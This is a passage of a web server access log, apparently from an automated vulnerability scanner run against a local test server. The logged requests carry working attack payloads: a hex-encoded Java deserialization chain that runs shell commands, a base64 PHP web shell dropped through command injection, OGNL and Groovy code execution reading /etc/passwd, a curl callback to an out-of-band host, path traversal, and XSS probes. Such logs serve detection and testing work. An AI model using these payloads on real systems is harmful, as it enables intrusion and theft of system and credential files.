E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.xhtml?faces-redirect=true HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/userportal/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /content../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"ip=127.0.0.1|echo \x22PD9waHAKJGNtZD0kX0dFVFsnY21kJ107CnN5c3RlbSgkY21kKTsKPz4K\x22|base64 -d > poc.php&mac=00-00","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /guest_auth/guestIsUp.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"notdelay=true&command=cat /etc/passwd","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cli.php?a=shell HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.axiom/accounts/do.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x22&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX%3Cscript%3Ealert(31337)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /server/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"sondata[ip]=a|curl ca2tuc8smpv1g2s80ca0kdtcghbhkc3ce.oast.pro&jsondata[type]=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/ping.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /libs/cq/security/userinfo.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%5cexample.com@ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22email\x22:\x2229N5EjIFHNb713sEsEj4S3XNwzC@example.com\x22,\x22password\x22:\x2229N5EjIFHNb713sEsEj4S3XNwzC\x22,\x22username\x22:\x2229N5EjIFHNb713sEsEj4S3XNwzC\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/user/reg HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?29N5Eg18jWiXRmHunF6kUeJYxBL=9 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.swp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22dashboard\x22: {\x22editable\x22:false,\x22hideControls\x22:true,\x22nav\x22:[{\x22enable\x22:false,\x22type\x22:\x22timepicker\x22}],\x22rows\x22: [{}],\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{},\x22timezone\x22:\x22browser\x22,\x22title\x22:\x22Home\x22,\x22version\x22:5},\x22expires\x22: 3600}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/menu/latest/admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"action=verify-haras","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/rpc HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /php-opcache-status/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ovirt-engine/webadmin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/threaddump HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /events../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/error.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /guest_auth/poc.php?cmd=cat%20/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /weaver/org.springframework.web.servlet.ResourceServlet?resource=/WEB-INF/web.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x0D\x0A \x22name\x22: \x22test\x22\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /website/blog/ HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /intikal/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"\x5Cx00", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://%23.example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/group/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /settings.php.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/arforms/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /opcache-status/opcache.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream())) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zentao/index.php?mode=getconfig HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /media../.git/config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /log/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22userName\x22:\x22admin\x22,\x22password\x22:\x22cs141-snmp\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"{\x22size\x22:1, \x22script_fields\x22: {\x22lupin\x22:{\x22lang\x22:\x22groovy\x22,\x22script\x22: \x22java.lang.Math.class.forName(\x5C\x22java.lang.Runtime\x5C\x22).getRuntime().exec(\x5C\x22cat /etc/passwd\x5C\x22).getText()\x22}}}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /_search HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elocker_old/storage/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "19/May/2022:06:10:15 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php 